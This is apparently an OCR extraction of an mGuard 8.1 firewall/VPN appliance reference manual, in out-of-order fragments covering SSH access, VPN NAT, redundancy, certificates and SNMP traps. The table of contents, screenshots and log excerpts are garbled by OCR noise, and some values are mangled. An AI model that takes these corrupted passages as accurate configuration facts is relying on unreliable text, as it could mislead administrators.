384. s When set to Yes default the mGuard terminates the tele phone connection as soon as no data traffic is transmitted over the time period specified under Idle time The mGuard gives the connected modem the relevant command for termi nating the telephone connection When set to No the mGuard does not give the connected modem a command for terminating the telephone connection Default 300 If there is still no data traffic after the time speci fied here has elapsed the mGuard can terminate the tele phone connection see above under Idle timeout IP address of the serial interface of the mGuard that now acts as the WAN interface If this IP address is assigned dynami cally by the Internet service provider use the preset value 0 0 0 0 Otherwise e g for the assignment of a fixed IP address enter this here IP address of the partner When connecting to the Internet this is the IP address of the Internet service provider which is used to provide access to the Internet As the Point to Point Protocol PPP is used for the connection the IP address does not usually have to be specified This means you can use the preset value 0 0 0 0 The subnet mask specified here belongs to both the Local IP address and the Remote P address Normally all three values Local IP Remote IP Netmask are either fixed or remain set to 0 0 0 0 Enter the connection settings for an external modem on the Modem Console tab page see Mode
385. s Leg ID fa ssh acoess A 00000000 0000 00 PET romp interface Action Comment F E 0 0 0 0 0 External Accept a 0 0 0 0 0 External Accept RADIUS Authentication Use RADIUS authentication for Shell access Please note Even if RADIUS is the only method for password authentication root is still able to authenticate with the local password No X 509 Authentication Enable X 509 certificates for SSH Ye w access SSH server certificate mguard hh kunde de gt x F SSH RootCA 01 w Displayed when En SHAAN able X 509 certifi CALPS OROS AG E cess is set to Yes p ae baa x Client certificate Authorized for access as z Krafti Herbert w rot v F Findig Petra root Y The mGuard must not be simultaneously configured via the web access shell access or SNMP Simultaneous configuration via the different access methods might lead to unex pected results 40 Innominate Security Technologies 105661_en_02 Management menu Management gt gt System Settings gt gt Shell Access Shell Access When SSH remote access is enabled the mGuard can be configured from remote com puters using the command line This option is disabled by default NOTE If remote access is enabled ensure that secure passwords are de fined for root and admin Make the following settings for SSH remote access Session Timeout sec Specifies after what period of inactivity in seconds the ses onds sion i
386. s X 509 Authentication Enable X 509 If No is selected then only conventional authentication A ri canerne lide certificates for methods user name and password or private and public SSH access keys are permitted not the X 509 authentication method in the scope of functions for l ao the mGuard rs2000 3G f Yes is selected then the X 509 authentication method mGuard rs2000 can be used in addition to conventional authentication methods as also used for No If Yes is selected the following must be specified How the mGuard authenticates itself to the SSH cli ent according to X 509 see SSH server certificate 1 How the mGuard authenticates the remote SSH cli ent according to X 509 see SSH server certificate 2 105661_en_02 Innominate Security Technologies 47 mGuard 8 1 Management gt gt System Settings gt gt Shell Access SSH server certificate Specifies how the mGuard identifies itself to the SSH 1 client Select one of the machine certificates from the list or the None entry None When None is selected the SSH server of the mGuard does not authenticate itself to the SSH client via the X 509 certificate Instead it uses a server key and thus behaves in the same way as older versions of the mGuard If one of the machine certificates is selected this is also offered to the SSH client The client can then decide whether to use the conventional authentication method or the method acco
387. s automatically terminated i e automatic logout When set to O default settings the session is not terminated auto matically The specified value is also valid for shell access via the serial interface instead of via the SSH protocol The effects of the Session Timeout field settings are tempo rarily ineffective if processing of a shell command exceeds the number of seconds set In contrast the connection can also be aborted if it is no longer able to function correctly see Delay between requests for a sign of life on page 42 Enable SSH remote If you want to enable SSH remote access set this option to access Yes Internal SSH access i e from the directly connected LAN or from the directly connected computer can be enabled independently of this setting The firewall rules for the available interfaces must be defined on this page under Allowed Networks in order to specify dif ferentiated access options on the mGuard 105661_en_02 Innominate Security Technologies 41 mGuard 8 1 Management gt gt System Settings gt gt Shell Access 42 Port for incoming SSH Default 22 connections remote administration only Delay between requests for a sign of life Innominate Security Technologies If this port number is changed the new port number only ap plies for access via the External External 2 VPN and Dial in interface Port number 22 still applies for internal access The remote partn
388. s not translated into an IP address that is identical for all devices as is the case with Masquerading If local devices transmit data packets only those data packets are considered which Are actually encrypted by the mGuard the mGuard only forwards packets via the VPN tunnel if they originate from a trustworthy source Have a source address within the network which is de fined here under Local The data packets are assigned a destination address from the network that is set under Remote If necessary the source ad dress is also replaced see Local The data packets are then transmitted via the VPN tunnel Type Tunnel Remote Masquerade Tunnel v 192 168 1 1 32 Masquerade w 192 168 254 1 32 Masquerade w 192 168 1 0 24 192 168 1 1 Only one IP address subnet mask 32 is permitted as the VPN network for this setting The network to be masqueraded is translated to this IP address The data packets are then transmitted via the VPN tunnel Masquerading changes the source address and source port The original addresses are recorded in an entry in the Conn track table Where response packets are received via the VPN tunnel and there is a matching entry in the Conntrack table these packets have their destination address and destination port written back to them 105661_en_02 Innominate Security Technologies 265 mGuard 8 1 Tunnel settings IPsec L2TP If clients should connect via the mGuard by IPsec L2TP
389. s of Dead Peer Detection DPD using the relevant configured time This effect is beyond the influence of the mGuard In the event of path redundancy caused by a network lobotomy the VPN connections are no longer supported A network lobotomy must be prevented whenever possible Innominate Security Technologies 353 mGuard 8 1 X 509 certificates for VPN authentication The mGuard supports the use of X 509 certificates when establishing VPN connections This is described in detail under Authentication on page 269 However there are some special points to note when X 509 certificates are used for authen ticating VPN connections in conjunction with firewall redundancy and VPN redundancy Switching machine certificates A redundant pair can be configured so that it uses an X 509 certificate and the correspond ing private key together to identify itself to a remote VPN partner as an individual virtual VPN instance These X 509 certificates must be renewed regularly If the VPN partner is set to check the validity period of the certificates these certificates must be renewed before their validity ex pires see Certificate settings on page 195 Ifa machine certificate is replaced all VPN connections which use it are restarted by the mGuard While this is taking place the mGuard cannot forward any data via the affected VPN connections for a certain period of time This period depends on the number of VPN connections affected
390. s operating the VPN connection except in the event of a network lobotomy Basic requirements for VPN redundancy VPN redundancy does not have any of its own variables It currently does not have its own menu in the user interface it is activated together with firewall redundancy instead VPN redundancy can only be used if the corresponding license has been purchased and installed on the mGuard As VPN connections must be established for VPN redundancy a corresponding VPN li cense is also necessary If you only have the license for firewall redundancy and VPN connections are installed VPN redundancy cannot be activated An error message is displayed as soon as an attempt is made to use firewall redundancy Only identical mGuard devices can be used together in a redundant pair 16 2 1 Components in VPN redundancy The components used in VPN redundancy are the same as described under firewall redun dancy One additional component is available here VPN state synchronization A small number of components are slightly expanded for VPN redundancy However the connec tivity check availability check and firewall state synchronization are all performed in the same way as before VPN state synchronization The mGuard supports the configuration of firewall rules for the VPN connection VPN state synchronization monitors the state of the different VPN connections on the active mGuard It ensures that the mGuard on standby receives
391. sMAC This trap is sent when a DHCP request is received from an un known client additional enterprise oid mGuard generic trap enterpriseSpecific specific trap mGuardTrapSSHLogin mGuardTResSSHUsername mGuardT ResSSHRemotelP This trap is sent when someone accesses the mGuard via SSH additional enterprise oid mGuard generic trap enterpriseSpecific specific trap mGuardTrapSSHLogout mGuardTResSSHUsername mGuardT ResSSHRemotelP This trap is sent when access to the mGuard via SSH is termi nated additional Activate traps Yes No enterprise oid mGuardTrapSenderlndustrial generic trap enterpriseSpecific specific trap mGuardTrapIindustrialPowerStatus 2 additional mGuardTrapindustrialPowerStatus Sent when the system registers a power failure enterprise oid generic trap specific trap additional mGuardTrapSenderlndustrial enterpriseSpecific mGuardTrapSignalRelais 3 mGuardTResSignalRelaisState mGuardTEsSignlalRelaisReason mGuardTResSignal RelaisReasonldx Sent after the signal contact is changed and indicates the cur rent status 0 Off 1 On Innominate Security Technologies 85 mGuard 8 1 Management gt gt SNMP gt gt Trap Agent external config storage temperature mGuard blade Controller Blade status change traps BLADE only Blade reconfiguration 86 Innominate
392. screen You can also open this area by clicking the letter icon 20 Innominate Security Technologies 105661_en_02 105661_en_02 Configuration help 2 4 Using the web interface You can click on the desired configuration via the menu on the left hand side e g Management Licensing The page is then displayed in the main window usually in the form of one or more tab pages where settings can be made If the page is organized into several tab pages you can switch between them using the tabs at the top Working with tab pages You can make the desired entries on the corresponding tab page see also Working with sortable tables on page 22 Youcan return to the previously accessed page by clicking on the Back button located at the bottom right of the page if available Entry of impermissible values If you enter an impermissible value e g an impermissible number in an IP address and click on the Apply button the relevant tab page title is displayed in red This makes it easier to trace the error Buttons The following buttons are located at the top of every page Logout For logging out after configuration access to the mGuard If the user does not log out he she is logged out automatically if there has been no further activity and the time period specified by the configuration has elapsed Access can only be restored by logging in again Reset Resets to the original values If you have en
393. section that contains the log ID and number in the relevant log entry for example fw https access 1 1ec2c133 dca1 1231 bfa5 000cbe01010a 2006 08 21 _15 24 26 42257 gai HITPS_ACCESS UUID changed to lec2c133 dcal 1231 bfaS 000cbe01010a 2006 08 21 15 24 26 42271 gai HITPS_REMOTE_ACCESS RULES 0 LOG changed to yes 2006 08 21 15 24 53 80830 gai SSH_ACCESS UUID changed to lec2c134 dcal 1231 bfaS 000cbe01010a 2006 08 21 15 24 53 81051 gai SSH_REMOTE_ACCESS RULES 0 LOG changed to yes 2006 08 21 15 25 05 87729 kernel fw https access 1 lec2c133 dcal 1231 bfaS 000cbe01010e act ACCEPT IN ethO OUT 2006 08 21 15 26 03 86944 kernel fw https access 1 lec2c133 dcal 1231 bfaS 000cbe01010a act ACCEPT IN ethO OUT 2006 08 21 _15 33 24 99599 ntpd 2137 no servers reachable 2006 08 21 15 34 59 15168 kernel fw prtps access 1 lec2c133 dcal 1231 bfaS 000cbe01010a act ACCEPT IN ethO OUT Zee 1S 43 02 46817 kernel fw https a 1 1lec2c133 dcal 1231 bfaS 000cbe01010a act ACCEPT IN ethO OUT 2006 08 21 _ 15 43 08 28081 kernel fw https access amp lec2c133 dcal 1231 1010a act ACCEPT IN ethO OUT 2006 08 21 15 43 14 48090 kernel Smaa bet otal A ech ot Pe ee et ee ee eee aCt ACCEPT IN ethO OUT Common V SNMP LLDP V Network Security V CIFS AV Scan Connector V py CIFS Integrity Checking V IPsec VPN V Jump to firewall rule 2 Copy this section into the Jump to firewall rule field 3 Click on Lookup
394. see Management gt gt Configuration Profiles on page 74 Configuration Pull on page 91 interruption of the connection at a certain time using PPPoE network mode This is the case when Network Mode is set to PPPoE under the Network gt gt Inter faces General menu item and Automatic Re connect is set to Yes see 6 1 Network gt gt Interfaces Router network mode PPPoE router mode on page 127 Acceptance of certificates when the system time has not yet been synchro nized This is the case when the Wait for synchronization of the system time setting is se lected under the Authentication gt gt Certificates Certificate settings menu item for the Check the validity period of certificates and CRLs option see Authentication gt gt Certificates and Certificate settings on page 195 CIFS integrity checking The regular automatic check of the network drives is only started when the mGuard has a valid time and date see the following section The system time can be set or synchronized by various events Synchronized by hardware clock The mGuard has a built in clock which has been synchronized with the current time at least once A synchronized built in clock ensures that the mGuard has a synchronized system time even after a restart Synchronized manually The administrator has defined the current time for the mGuard runtime by making a corresponding entry in the Local
395. shown by the partner PLUS if required Remote certificates if used as a filter The partner can additionally provide sub CA certificates In this case the mGuard can form the set union for creating the chain from the CA certificates provided and the self configured CA certificates The corre sponding root CA certificate must always be available on the mGuard See Management gt gt Web Settings on page 56 Access on page 57 Innominate Security Technologies 193 mGuard 8 1 Authentication for VPN The partner shows the Machine certificate signed Machine certificate self following by CA signed The mGuard authenti cates the partner using Remote certificate Remote certificate Or all CA certificates that form the chain to the root CA certificate together with the certificate shown by the part ner NOTE It is not sufficient to simply install the certificates to be used on the mGuard under Authentication gt gt Certificates In addition the mGuard certificate imported from the pool that is to be used must be referenced in the relevant applications VPN SSH HTTPS The remote certificate for authentication of a VPN connection or the channels of a VPN connection is installed in the Psec VPN gt gt Connections menu 194 Innominate Security Technologies 105661_en_02 Authentication menu 7 4 1 Certificate settings Authentication Certificates Certificate settings Machine C
396. side the initiator must first detect the interruption and then reestablish the con nection VPN redundancy supports masquerading in the same way as without VPN redundan cy This applies when a redundant pair is masked by a NAT gateway with a dynamic IP address For example a redundant pair can be hidden behind a DSL router which masks the re dundant pair with an official IP address This DSL router forwards the IPsec data traffic IKE and ESP UDP ports 500 and 4500 to the virtual IP addresses If the dynamic IP address changes all active VPN connections which run via the NAT gateway are rees tablished The connections are reestablished by means of Dead Peer Detection DPD using the relevant configured time This effect is beyond the influence of the mGuard The redundancy function on the mGuard does not support path redundancy Path re dundancy can be achieved using other methods e g by using a router pair This router pair is seen on the virtual side of the mGuard devices By contrast on the other side each of the routers has different connections Path redundancy must not use NAT mechanisms such as masquerading to hide the vir tual IP addresses of the mGuard devices Otherwise a migration from one path to an other would change the IP addresses used to mask the redundant pair This would mean that all VPN connections all ISAKMP SAs and all IPsec SAs would have to be reestablished The connections are reestablished by mean
397. sitional data Positioning data valid Number of Satellites 6 Latitude of the current position 52 43213 Longitude of the current position 13 53620 Show in OpenStreetMap Network gt gt Mobile Network gt gt Positioning system Settings Current position 105661_en_02 Enable positioning engine Update System time Validity of the posi tional data Number of Satellites Latitude of the current position Longitude of the cur rent position Show in OpenStreet Map http www openstreetmap org mlat 52 43213 amp mlon 13 53620 map 16 52 43213 13 53620 When you enable this function the position of the mGuard is determined Enables time synchronization through the positioning system in use When setting Yes enter the local system time under Man agement gt gt System Settings gt gt Time and Date Indicates whether valid positioning data is available for the mGuard Displays the number of available GPS GLONASS satellites for the mGuard which are available for position determination At least two satellites must be available Four available satel lites are required for precise position determination The longi tude and latitude can be precisely determined to 10 m Values 0 24 Displays the current latitude of the mGuard position Displays the current longitude of the mGuard position When you enable this function the position data of the mGuard is displayed A functional Int
398. sseuseseees 167 Network gt gt Mobile Network cccccsccccessceeseeeceseeeeeseesesseeeeseeueesesseeseaeessnaeess 168 6 7 1 Elola pe Baer een ee eee een ener Ree nee eee T T A EAE TTET 169 6 7 2 IIMS SEUNG S eiee a e r snl seaweed acaele oes 174 6 7 3 Text message Notifications cc cceecseeeeeeceesseeeeeceeeaneseeeeeeeaaeeeenes 177 6 7 4 POSIIONING SY SUCIIN ai e A E ebateu nin semaespecaoneeecenaniaioe 179 105661_en_02 Table of contents 7 AUNEnuUcCa 0 gl MENU lgmeeeemerer creme teetear artterse eon mare ea ers gay rene amino ee ra na aeteneetor eee eee es eee ere 181 7 1 Authentication gt gt Administrative Users cccccccceseeeeeeeeeeeeeeeeeeeeeesseeeesaneeesaees 181 7 1 1 PASSW S atona cuca dee eecteat i aatetencd rad esaianeidtasandete camsetive xs 181 7 1 2 RADIUS TGS var cele cea ok eect E 183 7 2 Authentication gt gt Firewall Users cccccccccccseeeeeceeseeeecesseeceeeeeeceusneeessaaeeess 185 7 2 1 Firewall AW SOS atatescetateeneitacnt aiasids eis E eeteasaactausenseuney 185 7 2 2 ACCESO iniis turret entra sen tee Secs teen tes eporinaranta vans dua caeeed eaten deaia eta 186 7 2 3 Stals xa ee ceca ENON TEENA 187 7 3 Authentication gt gt RADIUS cccccceececceeseeececeeeeeeceeeeeeeceasseesseeaeeecsuaneeessaaeeess 187 7 4 Authentication gt gt Certificates ccccccccsssseeceseseceeceeseeeeseeseeesseuseeeceuaeeesssaaeeess 190 7 4 1 CEMINCALC SETIINGS a dece Me
399. state of the mGuard devices State monitoring ensures that the active mGuard mirrors its data onto the other mGuard state synchronization 16 1 3 Firewall redundancy settings from previous versions Existing configuration profiles on firmware version 6 1 x and earlier can be imported with certain restrictions For information please contact Innominate 16 1 4 Requirements for firewall redundancy To use the redundancy function both mGuards must have the same firmware The firewall redundancy function can only be activated when a valid license key is in stalled See under Redundancy gt gt Firewall Redundancy gt gt Redundancy gt gt Enable redun dancy Redundancy gt gt Firewall Redundancy gt gt Redundancy gt gt Interface which is used for state synchronization The Dedicated interface value is only accepted on mGuards which have more than two physical and separate Ethernet interfaces This is currently the mGuard centerport Each set of targets for the connectivity check can contain more than ten targets A fail over time cannot be guaranteed without an upper limit Redundancy gt gt Firewall Redundancy gt gt Redundancy gt gt External interface gt gt Primary targets for ICMP echo requests gt gt External interface gt gt Secondary targets for ICMP echo requests gt gt Internal interface gt gt Primary targets for ICMP echo requests gt gt Internal interface gt gt Secondary
400. strial rs Connection of the service contacts is described in the user manual for the devices UM EN MGUARD DEVICES A push button or an on off switch can be connected to the inputs One or more freely select able VPN connections or firewall rule records can be switched via the corresponding switch A mixture of VPN connections and firewall rule records is also possible The web interface displays which VPN connections and which firewall rule records are connected to this input The push button or on off switch is used to establish and release predefined VPN connec tions or to activate defined firewall rule records You can set whether to monitor specific VPN connections or firewall rule records and to dis play them using LEDs If VPN connections are being monitored an illuminated LED indicates that VPN connec tions are established The alarm output monitors the function of the mGuard and therefore enables remote diag nostics The associated LED lights up red if the alarm output is open due to an error The alarm output reports the following if it has been activated Failure of the redundant supply voltage Monitoring of the link status of the Ethernet connections Monitoring of the temperature condition Monitoring of the connection state of the internal modem Innominate Security Technologies 95 m Guard 8 1 4 7 1 Service I O Management Service VO Service lO Alarm output Input CMD 1
401. t CRL Upload If the CRL is available as a file it can also be loaded on the mGuard manually e Todo this click on Browse select the file and click on Import e Remember to save the imported CRL along with the other entries by clicking on the Apply button An up to date CRL file must always be used For this reason it is not included in the mGuard con figuration When exporting an mGuard configuration and then importing it to another mGuard the CRL file must be uploaded again CRL files might be deleted during a firmware up date In this case the mGuard downloads the CRL files from the specified URL again Alterna tively it can be uploaded manually 204 Innominate Security Technologies 105661_en_02 Network Security menu 8 Network Security menu a This menu is not available on the mGuard blade controller A reduced version of the menu is available on the mGuard rs2000 3G 8 1 Network Security gt gt Packet Filter The mGuard includes a Stateful Packet Inspection Firewall The connection data of an ac tive connection is recorded in a database connection tracking Rules can thus only be de fined for one direction This means that data from the other direction of the relevant connec tion and only this data is automatically allowed through A side effect is that existing connections are not aborted during reconfiguration even if a corresponding new connection can no longer be established D
402. t User Firewall Templates Timeout type static dynamic With a static timeout users are logged out automatically as soon as the set timeout time has elapsed With dynamic time out users are logged out automatically after all the connec tions have been closed by the user or have expired on the mGuard and the set timeout time has elapsed An mGuard connection is considered to have expired if no more data is sent for this connection over the following peri ods Connection expiration period after non usage TCP 5 days this value can be set see Timeout for established TCP connections Sseconds on page 218 120 seconds are added after closing the connection This also applies to connections closed by the user UDP 30 seconds after data traffic in one direction 180 seconds after data traffic in both directions ICMP 30 seconds Others 10 minutes VPN connection Specifies the VPN connection for which this user firewall rule is valid This requires an existing remote access through the VPN tun nel to the web interface 105661_en_02 Innominate Security Technologies 227 mGuard 8 1 Network Security gt gt User Firewall gt gt User Firewall Templates gt gt Edit gt Template users Network Security User Firewall BluePrint General Template users Firewall rules Users i l p Service_1 Specify the names of the users here The names must correspond to those that
403. t even under high load 352 Innominate Security Technologies 105661_en_02 Redundancy 16 2 9 Limits of VPN redundancy The limits documented above for firewall redundancy also apply to VPN redundancy see Limits of firewall redundancy on page 344 Further restrictions also apply 105661_en_02 The redundant pair must have the same configuration with respect to the following General VPN settings Each individual VPN connection The mGuard only accepts VPN connections on the first virtual IP address In Router network mode this means the first internal IP address and the first exter nal IP address The following features cannot be used with VPN redundancy Dynamic activation of the VPN connections using a VPN switch or the CGI script command nph vpn cgi only on mGuard rs4000 3G and mGuard rs4000 Archiving of diagnostic messages for VPN connections VPN connections are only supported in Tunnel mode Transport mode does not take sufficient account of VPN connections The upper limit of the fail over switching time does not apply to connections which are encapsulated with TCP Connections of this type are interrupted for a prolonged period during a fail over The encapsulated TCP connections must be reestablished by the initiating side after each fail over If the fail over occurred on the initiating side they can start immediately after the transfer However if the fail over occurred on the an swering
404. t gt Firewall Users gt gt Firewall Users Authentication Method Local DB when Local DB is selected the password assigned to the user must be entered in the User Password column in addition to the User Name that must be entered on login RADIUS if RADIUS is selected the user password can be stored on the RADIUS server User Password Only active if Local DB is selected as the authentication method 7 2 2 Access Authentication Firewall Users Firewall Users Access Status HTTPS Authentication via x Interface F DMZ z External2 w Internal w Es Dian v Authentication gt gt Firewall Users gt gt Access Authentication via HTTPS NOTE For authentication via an external interface please consider the follow ing If a firewall user can log in via an unsecure interface and the user leaves the session without logging out correctly the login session may remain open and could be misused by another unauthorized person An interface is unsecure for example if a user logs in via the Internet from a location or a computer to which the IP address is assigned dynamically by the Internet service pro vider this is usually the case for many Internet users If such a connection is temporarily interrupted e g because the user logged in is being assigned a different IP address this user must log in again However the old login session under the old IP address remains open This
405. t a maintenance center to which mGuard devices establish a VPN connection Wait must be specified 261 Innominate Security Technologies mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt General Transport and Tunnel Set Type Tunnel eo mr tings 7 7 NoNAT gt NoN s Type Transport Transport and Tunnel Settings sx p Yes v Transport w Al Enabled Yes No Specify whether the connection channel should be active Yes or not No Comment Freely selectable comment text Can be left empty Protocol All means TCP UDP ICMP and other IP protocols Type The following can be selected Tunnel network network Transport host e host Tunnel network e network This connection type is suitable in all cases and is also the most secure In this mode the IP datagrams to be transmitted are completely encrypted and are with a new header trans mitted to the VPN gateway of the partner the tunnel end The transmitted datagrams are then decrypted and the origi nal datagrams are restored These are then forwarded to the destination computer Transport host host For this type of connection only the data of the IP packets is encrypted The IP header information remains unencrypted When you switch to Transport the following fields apart from Protocol are hidden as these parameters are omitted 262 Innominate Security Technologies 105661_en_02 IPsec VPN menu
406. t empty then any subject entries are permitted in the machine cer tificate shown by the VPN partner It is then no longer necessary to identify or define the subject in the certificate Limited access to certain subjects In the certificate the certificate owner is specified in the Subject field The entry is com prised of several attributes These attributes are either expressed as an object identifier e g 1382 3 7 32 1 or more commonly as an abbreviation with a corresponding value Example CN VPN endpoint 01 O Smith and Co C US lf certain subject attributes have very specific values for the acceptance of the VPN part ner by the mGuard then these must be specified accordingly The values of the other freely selectable attributes are entered using the asterisk wildcard Example CN O Smith and Co C US with or without spaces between attributes In this example the attributes O Smith and Co and C US should be entered in the certificate that is shown under Subject It is only then that the mGuard would accept the certificate owner Subject as a communication partner The other attributes in the certifi cates to be filtered can have any value Please note the following when setting a subject filter The number and the order of the attributes must correspond to that of the certificates for which the filter is used Please note this is case sensitive Innominate Security Technologies 273 mG
407. t for mobile phone and positioning functions see Network gt gt Mobile Network on page 168 Support for integrated managed and unmanaged Switches see Network gt gt Ethernet on page 148 Support for a dedicated DMZ port only mGuard rs4000 3G The DMZ port can be set so that it forwards packets to the internal external or second ary external interface The DMZ port is only supported in router mode and requires at least one IP address and a corresponding subnet mask The DMZ does not support any VLANs Removed functions Innominate Security Technologies HiDiscovery support The Accept button which accepts changes for the current page only has been re moved Changes are made across all pages 105661_en_02 Time schedule Extended display of the current status Status of the VPN extensions Unique names Timeout for the VPN connection Source based routing 105661_en_02 Changes compared to the previous version 3 2 1 New in CIFS Integrity Monitoring The time schedule has been improved in Version 8 0 Now more than one scan per day is possible Continuous scanning can also be set If the scan takes longer than planned it is aborted However you can adjust the settings so that a scan is started regularly Each row of the CIFS Integrity Monitoring also indicates the following information The status of the scanned importable shares The result of the last scan or the progress of the cur
408. t set there for the partner The data packets of local devices are assigned a source ad dress according to the address set under Local and are trans mitted via the VPN tunnel After clicking on the More button 1 1 NAT rules can be specified for each VPN tunnel for local devices In this way an IP range that is distributed over a wide network can be gath ered and sent through a narrow tunnel 105661_en_02 Innominate Security Technologies 263 mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt General Type Tunnel Local 1 1 NAT More button Local NAT Local NAT for IPsec tunnel connections internal network address J X Real network Virtual network 32 for local 1 to 1 NAT p 1 1 NAT 0 0 0 0 0 0 0 0 El 0 0 0 0 0 0 0 0 32 F F 0000 0 0 0 0 32 Real network Configures the From IP address for 1 1 NAT Virtual Network Configures the translated IP address for 1 1 NAT Netmask The subnet mask as a value between 1 and 32 for the real and virtual network address see also CIDR Classless Inter Do main Routing on page 24 Comment Can be filled with appropriate comments Local 1 1 networks must be specified in ascending order beginning with the smallest network up to the largest network Type Tunnel Local Masquerade a e a Tunnel 192 168 1 1 32 Masquerade w 192 168 254 1 32 Masquerade w 192 168 1 0 24 192 168 1 1 If local devices transmit data packets only those
409. taceuta meter cees es 195 7 4 2 Machine Certificates sciesin c isles a eascsaaleic iach enisaidieaded ical ele ieee 197 7 4 3 CAC CiMNIG Ale Sots cactcacnt ecetoe cette OEE I Ea 199 7 4 4 Remote Cenilicates 2 i cAeet eee ses cl toate toleelieelaia 201 7 4 5 eee ne ee Re eee ee ee eee eee 203 9 MNGIWOIK Securty Meni rsisi ee 205 8 1 Network Security gt gt Packet Filter c ccccccsecccceeeeceeeceeeeeseeeeeeeseeeeesseeeeeeeas 205 8 1 1 IFC OFMIPIOIMUNE S lt asancasanetecavestencsseececceenesacsssestasadeanecueiedecoaauere stagione 206 8 1 2 OUTGOING Tile Sesia a E E O AS 208 8 1 3 Ze sina AEA EA E E AE A E E A E E 210 8 1 4 RMG RECOS anses a a ea hewee 212 8 1 5 MAC FIRGIG erona E R 215 8 1 6 AdVanC OO aana oaa RaRa RN 216 8 1 7 Firewall for the mGuard rs2000 SG ccccecseeeeeeeeseeeeeeeseeeeaeeeeeens 222 8 2 Network Security gt gt DOS Protection cccceeccceceeeeeeeceeeeeeeseeseeeeeeseeeeseeeeeeeess 223 8 2 1 F IOOG F FOLCCUON sosro tat naicedere te secnaeence a ee dee eee eae aeonaaury 223 8 3 Network Security gt gt User Firewalll ccccccsseeeeeceeeeeeeceeeeeeeeesseeessseeeeseeseeseees 225 8 3 1 User Firewall Templates catsizacsisinessadsasasearstactaysuaracantaestasliloiiassesd 225 9 CIFS Integrity Monitoring MENU zsireriracne deoeel a cee rt accede ine eee eed a 229 9 1 CIFS Integrity Monitoring gt gt Importable Shares cccecceeeeeeeeeeeeeeeeeneeeeeees 230 9
410. tantly this will not be possible This problem can be avoided if the operator of the computer has an account with a DynDNS pro vider DNS Domain Name Server In this case the operator can set a host name with this provider via which the computer should be accessible e g www example com The DynDNS provider also provides a small program that must be installed and run on the computer concerned Every time a new Inter net session is launched on the local computer this tool sends the IP address used by the computer to the DynDNS provider The domain name server registers the current assign ment of the host name to the IP address and also informs the other domain name servers on the Internet accordingly If a remote computer now wishes to establish a connection to a computer that is registered with the DynDNS provider then the remote computer can use the host name of the com puter as the address This establishes a connection to the responsible DNS in order to look up the IP address that is currently registered for this host name The corresponding IP ad dress is sent back from the DNS to the remote computer which can then use it as the des tination address This now leads directly to the desired computer In principle all Internet addresses are based on this procedure first a connection toa DNS is established in order to determine the IP address assigned to the host name Once this has been accomplished the established IP address is us
411. te is needed here ifand only iftis No Certificate installed self signed Otherwise the certificate of the CA l Durchsuchen m 7 i which issued the servers certificate must be installed ae The mGuard can retrieve new configuration profiles from an HTTPS server in adjustable time intervals provided that the server makes them available to the mGuard as files file ex tension atv If the configuration provided differs from the active configuration of the mGuard the available configuration is automatically downloaded and activated Management gt gt Central Management gt gt Configuration Pull Configuration Pull Pull Schedule Here specify whether and if so when and at what intervals the mGuard should attempt to download and apply a new con figuration from the server To do this open the selection list and select the desired value A new field is shown when Time Schedule is selected In this field specify whether the new configuration should be down loaded from the server daily or regularly on a certain weekday and at what time Time controlled download of a new configuration is only pos sible if the system time has been synchronized see Manage ment gt gt System Settings on page 33 Time and Date on page 35 Time control sets the selected time based on the configured time zone Server IP address or host name of the server that provides the config urations 105661_en_02 Innominate Securi
412. te settings Machine Certificates CA Certificates Remote Certificates CRL Trusted CA Certificates ics Subject CN VPN RootCA 01 O BeispielLieferant C DE Subject Alternative Names Issuer CN VPN RootCA 01 O Beispie Lieferant C DE Validity From Mar 20 15 56 38 2007 GMT to Mar 20 15 56 38 2022 GMT Fingerprint MDS 49 13 FB 16 C8 3A DE C3 F7 70 AB F9 5B 76 BD 40 SHA1 12 C2 4C 53 7B 60 62 FA C0 83 61 C4 92 98 03 32 75 1D 29 75 Shoriname WPN RootCA01 Upload Certificate Filename Durchsuchen import P Douniosa ceritone Authentication gt gt Certificates gt gt CA Certificates Trusted CA Certificates Displays the current imported CA certificates To import a new certificate proceed as follows Importing a CA certificate The file file name extension cer pem or crt is saved on the connected computer Proceed as follows e Click on Browse to select the file e Click on Import Once imported the loaded certificate appears under Certificate e Save the imported certificate by clicking on Apply Shortname When importing a CA certificate the CN attribute from the certificate subject field is sug gested as the short name here providing the Shortname field is empty at this point This name can be adopted or another name can be chosen e You must assign a name The name must be unique 105661_en_02 Innominate Security Technologies 199 mGuard 8 1 Using the short name During the c
413. te synchronization can contain a maximum of ten targets Secondary targets for See above O ECNO request Only used if the check of the primary targets has failed Failure of a secondary target is not detected in normal opera tion Default 10 0 0 30 10 0 0 31 for new addresses Each set of targets for state synchronization can contain a maximum of ten targets Internal interface Kind of check Specifies whether a connectivity check is performed on the in ternal interface and if so how The settings are the same as those for the external interface Primary targets for See above ICMP echo requests Eactory default 192 168 1 30 192 168 1 31 for new addresses Secondary targets for See above ICMP echo requests Factory default 192 168 1 30 192 168 1 31 for new addresses 314 Innominate Security Technologies 105661_en_02 Redundancy menu 13 2 Redundancy gt gt FW Redundancy Status 13 2 1 Redundancy Status Redundancy FW Redundancy Status Current State A E 2 C aa G jis a jing and fih twork traffi t s u Wed Nov 9 11 59 13 CET 2011 Status of the Components Availability Check Received no CARP announcements from another mGuard Wed Oct 26 15 49 20 CEST 2011 Availability Check per eer Received no CARP announcements from another mGuard Wed Oct 26 15 49 19 CEST 2011 Availability Check Interface for State Synchronization Received no CARP announcements from another mGuard Wed Oct 26 15 49 20 CEST
414. tealth Router The mGuard must be set to the network mode that corre sponds to its connection to the network Depending on which network mode the mGuard is set to the page will change together with its configuration parameters The Stealth network mode is not available for the mGuard rs2000 3G as it does not have a wired WAN interface See Stealth default setting mGuard rs4000 rs2000 mGuard industrial rs mGuard smart mGuard pci SD mGuard pcie SD mGuard pci mGuard delta EAGLE mGuard on page 108 and Network Mode Stealth on page 112 Router default setting mGuard rs4000 rs2000 3G mGuard centerport mGuard blade controller mGuard delta on page 109 and Network Mode Router on page 123 Static DHCP PPPoE PPTP Modem Built in Mo dem Built in mobile network modem See Router Mode static on page 110 and Router network mode PP TP router mode on page 128 Router Mode DHCP on page 110 and Router network mode DHCP router mode on page 126 Router Mode PPPoE on page 110 and Router network mode PPPoE router mode on page 127 Router Mode PPTP on page 110 and Router network mode PPTP router mode on page 128 Router Mode Modem on page 111 and Router network mode Modem router mode on page 129 Modem Built in modem Built in mobile network modem is not available for all mGuard
